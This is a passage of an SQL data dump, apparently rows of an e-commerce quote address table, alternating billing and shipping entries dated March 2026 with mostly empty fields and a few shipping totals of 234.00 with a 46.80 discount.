(1067, 717, '2026-03-28 15:40:31', '2026-03-28 15:40:31', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1068, 717, '2026-03-28 15:40:31', '2026-03-28 15:40:31', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1069, 718, '2026-03-28 15:40:32', '2026-03-28 15:40:32', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1070, 718, '2026-03-28 15:40:32', '2026-03-28 15:40:32', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1071, 719, '2026-03-28 15:40:33', '2026-03-28 15:40:33', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1072, 719, '2026-03-28 15:40:33', '2026-03-28 15:40:33', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1073, 720, '2026-03-28 15:40:35', '2026-03-28 15:40:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1074, 720, '2026-03-28 15:40:35', '2026-03-28 15:40:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1075, 721, '2026-03-28 15:40:36', '2026-03-28 15:40:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1076, 721, '2026-03-28 15:40:36', '2026-03-28 15:40:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1077, 722, '2026-03-28 15:40:37', '2026-03-28 15:40:37', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1078, 722, '2026-03-28 15:40:37', '2026-03-28 15:40:37', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1079, 723, '2026-03-28 15:40:42', '2026-03-28 15:40:42', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1080, 723, '2026-03-28 15:40:42', '2026-03-28 15:40:42', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1081, 724, '2026-03-28 15:40:45', '2026-03-28 15:40:45', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1082, 724, '2026-03-28 15:40:45', '2026-03-28 15:40:45', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1083, 725, '2026-03-28 15:40:50', '2026-03-28 15:40:50', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1084, 725, '2026-03-28 15:40:50', '2026-03-28 15:40:50', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1085, 726, '2026-03-28 15:40:59', '2026-03-28 15:40:59', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1086, 726, '2026-03-28 15:40:59', '2026-03-28 15:40:59', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1087, 727, '2026-03-28 15:41:03', '2026-03-28 15:41:03', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1088, 727, '2026-03-28 15:41:03', '2026-03-28 15:41:03', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1089, 728, '2026-03-28 15:41:06', '2026-03-28 15:41:06', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1090, 728, '2026-03-28 15:41:06', '2026-03-28 15:41:06', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1091, 729, '2026-03-28 15:41:09', '2026-03-28 15:41:09', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1092, 729, '2026-03-28 15:41:09', '2026-03-28 15:41:09', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1093, 730, '2026-03-28 15:41:11', '2026-03-28 15:41:11', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1094, 730, '2026-03-28 15:41:11', '2026-03-28 15:41:11', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1095, 731, '2026-03-28 15:41:16', '2026-03-28 15:41:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1096, 731, '2026-03-28 15:41:16', '2026-03-28 15:41:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1097, 732, '2026-03-28 15:41:18', '2026-03-28 15:41:18', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1098, 732, '2026-03-28 15:41:18', '2026-03-28 15:41:18', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1099, 733, '2026-03-28 15:41:21', '2026-03-28 15:41:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1100, 733, '2026-03-28 15:41:21', '2026-03-28 15:41:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1101, 734, '2026-03-28 15:41:24', '2026-03-28 15:41:24', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1102, 734, '2026-03-28 15:41:24', '2026-03-28 15:41:24', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1103, 735, '2026-03-28 15:41:26', '2026-03-28 15:41:26', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1104, 735, '2026-03-28 15:41:26', '2026-03-28 15:41:26', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1105, 736, '2026-03-28 16:48:45', '2026-03-28 16:48:45', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1106, 736, '2026-03-28 16:48:46', '2026-03-28 16:48:46', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1107, 737, '2026-03-28 17:45:30', '2026-03-28 17:45:30', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1108, 737, '2026-03-28 17:45:30', '2026-03-28 17:45:30', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1109, 738, '2026-03-28 23:50:04', '2026-03-28 23:50:04', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1110, 738, '2026-03-28 23:50:04', '2026-03-28 23:50:04', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1111, 739, '2026-03-29 00:26:22', '2026-03-29 00:26:22', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1112, 739, '2026-03-29 00:26:22', '2026-03-29 00:26:22', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
